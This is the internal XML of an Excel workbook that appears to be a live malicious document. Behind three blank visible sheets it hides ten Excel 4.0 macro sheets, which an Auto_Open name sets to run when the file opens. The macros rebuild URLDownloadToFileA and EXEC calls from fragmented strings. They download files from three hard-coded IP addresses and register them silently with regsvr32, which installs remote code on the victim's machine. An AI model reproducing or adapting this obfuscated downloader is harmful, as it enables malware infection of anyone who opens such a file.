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" ContentType="image/tif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macrosheets/intlsheet1.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet2.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet3.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet4.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet5.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet6.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet7.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet8.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/intlsheet9.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet1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/>
  <workbookPr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724AE29D-FC9F-4C91-BAAD-6FB5458F9DF3}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" activeTab="2" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet" sheetId="2" r:id="rId1"/>
    <sheet name="Sheet1" sheetId="13" r:id="rId2"/>
    <sheet name="Sheet2" sheetId="14" r:id="rId3"/>
    <sheet name="Pervi" sheetId="3" state="hidden" r:id="rId4"/>
    <sheet name="Pervi2" sheetId="4" state="hidden" r:id="rId5"/>
    <sheet name="sobr" sheetId="5" state="hidden" r:id="rId6"/>
    <sheet name="sobr1" sheetId="6" state="hidden" r:id="rId7"/>
    <sheet name="sobr2" sheetId="7" state="hidden" r:id="rId8"/>
    <sheet name="sobr3" sheetId="8" state="hidden" r:id="rId9"/>
    <sheet name="zap1" sheetId="9" state="hidden" r:id="rId10"/>
    <sheet name="zap2" sheetId="10" state="hidden" r:id="rId11"/>
    <sheet name="zap3" sheetId="11" state="hidden" r:id="rId12"/>
    <sheet name="osn" sheetId="12" state="hidden" r:id="rId13"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_Open">osn!$A$2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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="18" uniqueCount="17">
  <si>
    <t>.dat</t>
  </si>
  <si>
    <t>=</t>
  </si>
  <si>
    <t>REGIS</t>
  </si>
  <si>
    <t>TER("uRlMon","URL</t>
  </si>
  <si>
    <t>Download</t>
  </si>
  <si>
    <t>ToFile</t>
  </si>
  <si>
    <t>A","JJCCBB","Koki</t>
  </si>
  <si>
    <t>ser",,1,9)</t>
  </si>
  <si>
    <t>EX</t>
  </si>
  <si>
    <t>E</t>
  </si>
  <si>
    <t>C("regsvr</t>
  </si>
  <si>
    <t>32 -s "&amp;"..\Post.storg")</t>
  </si>
  <si>
    <t>32 -s "&amp;"..\Post.storg1")</t>
  </si>
  <si>
    <t>32 -s "&amp;"..\Post.storg2")</t>
  </si>
  <si>
    <t>..\Post.storg</t>
  </si>
  <si>
    <t>..\Post.storg1</t>
  </si>
  <si>
    <t>..\Post.storg2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</si>
</sst>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xlIntlMacrosheet" Target="macrosheets/intlsheet5.xml"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet3.xml"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet4.xml"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet9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microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet3.xml"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet8.xml"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet7.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet1.xml"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet6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17</xdr:col>
      <xdr:colOff>180975</xdr:colOff>
      <xdr:row>52</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="Pictures">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72862AAC-8816-41C3-9539-42F07951BA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058400" cy="10058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304800</xdr:colOff>
      <xdr:row>52</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="Pictures">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{948E62B8-D16C-49BB-8A8B-B7500E330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058400" cy="10058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304800</xdr:colOff>
      <xdr:row>52</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="Pictures">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32845B37-3ACB-4703-8B0F-C6A7B1B95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058400" cy="10058400"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/macrosheets/_rels/intl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macrosheets/_rels/intl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macrosheets/_rels/intl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macro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5E92984D-4438-4550-ABFE-0512EE9AFBF8}">
  <dimension ref="F7:K24"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="19.42578125" style="1" customWidth="1"/>
    <col min="2" max="5" width="8.7109375" style="1"/>
    <col min="6" max="6" width="16.5703125" style="1" customWidth="1"/>
    <col min="7" max="7" width="17" style="1" customWidth="1"/>
    <col min="8" max="8" width="8.7109375" style="1"/>
    <col min="9" max="9" width="16.28515625" style="1" customWidth="1"/>
    <col min="10" max="10" width="34" style="1" customWidth="1"/>
    <col min="11" max="11" width="12.140625" style="1" customWidth="1"/>
    <col min="12" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="7" spans="6:11" x14ac:dyDescent="0.25">
      <c r="J7" s="1" t="b">
        <f>NOW()=FORMULA(F12&amp;Pervi2!F13&amp;Pervi2!E14,J9)</f>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="6:11" x14ac:dyDescent="0.25">
      <c r="I10" s="1" t="s">
        <v>0</v>
      </c>
      <c r="J10" s="1">
        <f>RANDBETWEEN(245,8675436)</f>
        <v>7800682</v>
      </c>
    </row>
    <row r="12" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F12" s="1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F13" s="1" t="s">
        <v>2</v>
      </c>
      <c r="J13" s="1" t="e">
        <f>Kokiser(J24,K13&amp;I14&amp;J10&amp;I10,sobr!D19,J24,J24)</f>
        <v>#NAME?</v>
      </c>
      <c r="K13" s="1" t="str">
        <f>K16&amp;K17&amp;K18</f>
        <v>http://</v>
      </c>
    </row>
    <row r="14" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F14" s="1" t="s">
        <v>3</v>
      </c>
      <c r="I14" s="1" t="str">
        <f>"190.14.37.113/"</f>
        <v>190.14.37.113/</v>
      </c>
    </row>
    <row r="15" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F15" s="1" t="s">
        <v>4</v>
      </c>
      <c r="I15" s="1" t="str">
        <f>"101.99.95.206/"</f>
        <v>101.99.95.206/</v>
      </c>
      <c r="J15" s="1" t="e">
        <f>Kokiser(J24,K13&amp;I15&amp;J10&amp;I10,sobr!E19,J24,J24)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="16" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F16" s="1" t="s">
        <v>5</v>
      </c>
      <c r="I16" s="1" t="str">
        <f>"51.195.38.41/"</f>
        <v>51.195.38.41/</v>
      </c>
      <c r="K16" s="1" t="str">
        <f>"ht"</f>
        <v>ht</v>
      </c>
    </row>
    <row r="17" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F17" s="1" t="s">
        <v>6</v>
      </c>
      <c r="J17" s="1" t="e">
        <f>Kokiser(J24,K13&amp;I16&amp;J10&amp;I10,sobr!F19,J24,J24)</f>
        <v>#NAME?</v>
      </c>
      <c r="K17" s="1" t="str">
        <f>"tp"</f>
        <v>tp</v>
      </c>
    </row>
    <row r="18" spans="6:11" x14ac:dyDescent="0.25">
      <c r="F18" s="1" t="s">
        <v>7</v>
      </c>
      <c r="K18" s="1" t="str">
        <f>"://"</f>
        <v>://</v>
      </c>
    </row>
    <row r="21" spans="6:11" x14ac:dyDescent="0.25">
      <c r="J21" s="1" t="b">
        <f>RUN(sobr!H4)</f>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="6:11" x14ac:dyDescent="0.25">
      <c r="J24" s="1">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intl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152C4A83-66DD-4326-8571-1E54E357A647}">
  <dimension ref="E13:F15"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="14.42578125" style="1" customWidth="1"/>
    <col min="2" max="4" width="8.7109375" style="1"/>
    <col min="5" max="5" width="14" style="1" customWidth="1"/>
    <col min="6" max="6" width="20.5703125" style="1" customWidth="1"/>
    <col min="7" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="13" spans="5:6" x14ac:dyDescent="0.25">
      <c r="F13" s="1" t="str">
        <f>Pervi!F13&amp;Pervi!F14</f>
        <v>REGISTER("uRlMon","URL</v>
      </c>
    </row>
    <row r="14" spans="5:6" x14ac:dyDescent="0.25">
      <c r="E14" s="1" t="str">
        <f>F14&amp;F15</f>
        <v>DownloadToFileA","JJCCBB","Kokiser",,1,9)</v>
      </c>
      <c r="F14" s="1" t="str">
        <f>Pervi!F15&amp;Pervi!F16</f>
        <v>DownloadToFile</v>
      </c>
    </row>
    <row r="15" spans="5:6" x14ac:dyDescent="0.25">
      <c r="F15" s="1" t="str">
        <f>Pervi!F17&amp;Pervi!F18</f>
        <v>A","JJCCBB","Kokiser",,1,9)</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet3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7A82D335-2474-445A-8857-B2F2E1287B57}">
  <dimension ref="D8:K19"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="3" width="8.7109375" style="1"/>
    <col min="4" max="4" width="17.7109375" style="1" customWidth="1"/>
    <col min="5" max="5" width="12.5703125" style="1" customWidth="1"/>
    <col min="6" max="6" width="9.42578125" style="1" customWidth="1"/>
    <col min="7" max="7" width="8.7109375" style="1"/>
    <col min="8" max="8" width="20.140625" style="1" customWidth="1"/>
    <col min="9" max="10" width="8.7109375" style="1"/>
    <col min="11" max="11" width="12.5703125" style="1" customWidth="1"/>
    <col min="12" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="8" spans="4:11" x14ac:dyDescent="0.25">
      <c r="D8" s="1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="4:11" x14ac:dyDescent="0.25">
      <c r="D9" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="10" spans="4:11" x14ac:dyDescent="0.25">
      <c r="D10" s="1" t="s">
        <v>9</v>
      </c>
      <c r="H10" s="1" t="b">
        <f>NOW()=FORMULA(K10&amp;K11,I10)</f>
        <v>0</v>
      </c>
      <c r="K10" s="1" t="str">
        <f>D9&amp;D10</f>
        <v>EXE</v>
      </c>
    </row>
    <row r="11" spans="4:11" x14ac:dyDescent="0.25">
      <c r="K11" s="1" t="str">
        <f>D12</f>
        <v>C("regsvr</v>
      </c>
    </row>
    <row r="12" spans="4:11" x14ac:dyDescent="0.25">
      <c r="D12" s="1" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="15" spans="4:11" x14ac:dyDescent="0.25">
      <c r="D15" s="1" t="s">
        <v>11</v>
      </c>
      <c r="E15" s="1" t="s">
        <v>12</v>
      </c>
      <c r="F15" s="1" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="17" spans="4:8" x14ac:dyDescent="0.25">
      <c r="H17" s="1" t="b">
        <f>RUN(sobr1!G3)</f>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="4:8" x14ac:dyDescent="0.25">
      <c r="D19" s="1" t="s">
        <v>14</v>
      </c>
      <c r="E19" s="1" t="s">
        <v>15</v>
      </c>
      <c r="F19" s="1" t="s">
        <v>16</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet4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E2A17D7F-3482-40D4-93FE-A4279C188004}">
  <dimension ref="G8:G17"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="6" width="9.140625" style="1"/>
    <col min="7" max="7" width="32.5703125" style="1" customWidth="1"/>
    <col min="8" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="8" spans="7:7" x14ac:dyDescent="0.25">
      <c r="G8" s="1" t="b">
        <f>NOW()=FORMULA(sobr!I10&amp;sobr!D15,H8)</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="7:7" x14ac:dyDescent="0.25">
      <c r="G17" s="1" t="b">
        <f>RUN(sobr2!H6)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet5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2DF50EDB-73C2-476B-A52B-D0B8DEEA2B12}">
  <dimension ref="H12:H19"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="10.85546875" style="1" customWidth="1"/>
    <col min="2" max="2" width="8.7109375" style="1"/>
    <col min="3" max="3" width="11.28515625" style="1" customWidth="1"/>
    <col min="4" max="7" width="8.7109375" style="1"/>
    <col min="8" max="8" width="33" style="1" customWidth="1"/>
    <col min="9" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="12" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H12" s="1" t="b">
        <f>NOW()=FORMULA(sobr!I10&amp;sobr!E15,I12)</f>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H19" s="1" t="b">
        <f>RUN(sobr3!H7)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet6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A437CB3C-D058-47AA-8D02-E2620B07A475}">
  <dimension ref="H14:H21"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="8.7109375" style="1"/>
    <col min="2" max="2" width="15.5703125" style="1" customWidth="1"/>
    <col min="3" max="7" width="8.7109375" style="1"/>
    <col min="8" max="8" width="26.140625" style="1" customWidth="1"/>
    <col min="9" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="14" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H14" s="1" t="b">
        <f>NOW()=FORMULA(sobr!I10&amp;sobr!F15,I14)</f>
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H21" s="1" t="b">
        <f>RUN(zap1!H7)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet7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AEB6F3F2-DC19-4887-A031-91B4EB1869BC}">
  <dimension ref="H10:H18"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="12.85546875" style="1" customWidth="1"/>
    <col min="2" max="2" width="8.7109375" style="1"/>
    <col min="3" max="3" width="11.42578125" style="1" customWidth="1"/>
    <col min="4" max="7" width="8.7109375" style="1"/>
    <col min="8" max="8" width="30.140625" style="1" customWidth="1"/>
    <col min="9" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="10" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H10" s="1" t="b">
        <f>NOW()=FORMULA(sobr!D8&amp;sobr1!H8,H13)</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H18" s="1" t="b">
        <f>RUN(zap2!I6)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet8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E1739915-B9EA-432B-AA48-899F85E40FD8}">
  <dimension ref="I15:I22"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="12.7109375" style="1" customWidth="1"/>
    <col min="2" max="2" width="11.5703125" style="1" customWidth="1"/>
    <col min="3" max="8" width="8.7109375" style="1"/>
    <col min="9" max="9" width="23" style="1" customWidth="1"/>
    <col min="10" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="15" spans="9:9" x14ac:dyDescent="0.25">
      <c r="I15" s="1" t="b">
        <f>NOW()=FORMULA(sobr!D8&amp;sobr2!I12,I18)</f>
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="9:9" x14ac:dyDescent="0.25">
      <c r="I22" s="1" t="b">
        <f>RUN(zap3!J11)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/intlsheet9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78D9C269-F763-46CC-84F6-334AE824A649}">
  <dimension ref="J15:J20"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="12.85546875" style="1" customWidth="1"/>
    <col min="2" max="9" width="8.7109375" style="1"/>
    <col min="10" max="10" width="20" style="1" customWidth="1"/>
    <col min="11" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="15" spans="10:10" x14ac:dyDescent="0.25">
      <c r="J15" s="1" t="b">
        <f>NOW()=FORMULA(sobr!D8&amp;sobr3!I14,J18)</f>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="10:10" x14ac:dyDescent="0.25">
      <c r="J20" s="1" t="b">
        <f>HALT()</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet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CBDCEAD-4005-470A-9C61-3C84E3A19D6A}">
  <dimension ref="A11"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="13.42578125" style="1" customWidth="1"/>
    <col min="2" max="3" width="8.7109375" style="1"/>
    <col min="4" max="4" width="12.5703125" style="1" customWidth="1"/>
    <col min="5" max="7" width="8.7109375" style="1"/>
    <col min="8" max="8" width="11.140625" style="1" customWidth="1"/>
    <col min="9" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="11" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A11" s="1" t="e">
        <f>GOTO(Pervi!J5)</f>
        <v>#N/A</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1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FA5B5-7970-4C58-A3C9-A1C1C43EB523}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="8.7109375" style="2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D1BFF-E3FC-4321-82D7-50739B678FDD}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="3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9EF52-F4B3-4801-BB35-366240393135}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="3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Макросы Excel 4.0</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>10</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="13" baseType="lpstr">
      <vt:lpstr>Sheet</vt:lpstr>
      <vt:lpstr>Sheet1</vt:lpstr>
      <vt:lpstr>Sheet2</vt:lpstr>
      <vt:lpstr>Pervi</vt:lpstr>
      <vt:lpstr>Pervi2</vt:lpstr>
      <vt:lpstr>sobr</vt:lpstr>
      <vt:lpstr>sobr1</vt:lpstr>
      <vt:lpstr>sobr2</vt:lpstr>
      <vt:lpstr>sobr3</vt:lpstr>
      <vt:lpstr>zap1</vt:lpstr>
      <vt:lpstr>zap2</vt:lpstr>
      <vt:lpstr>zap3</vt:lpstr>
      <vt:lpstr>osn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Rabota</dc:creator>
  <cp:lastModifiedBy>Frank</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:19:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-01T12:44:56Z</dcterms:modified>
</cp:coreProperties>
</file>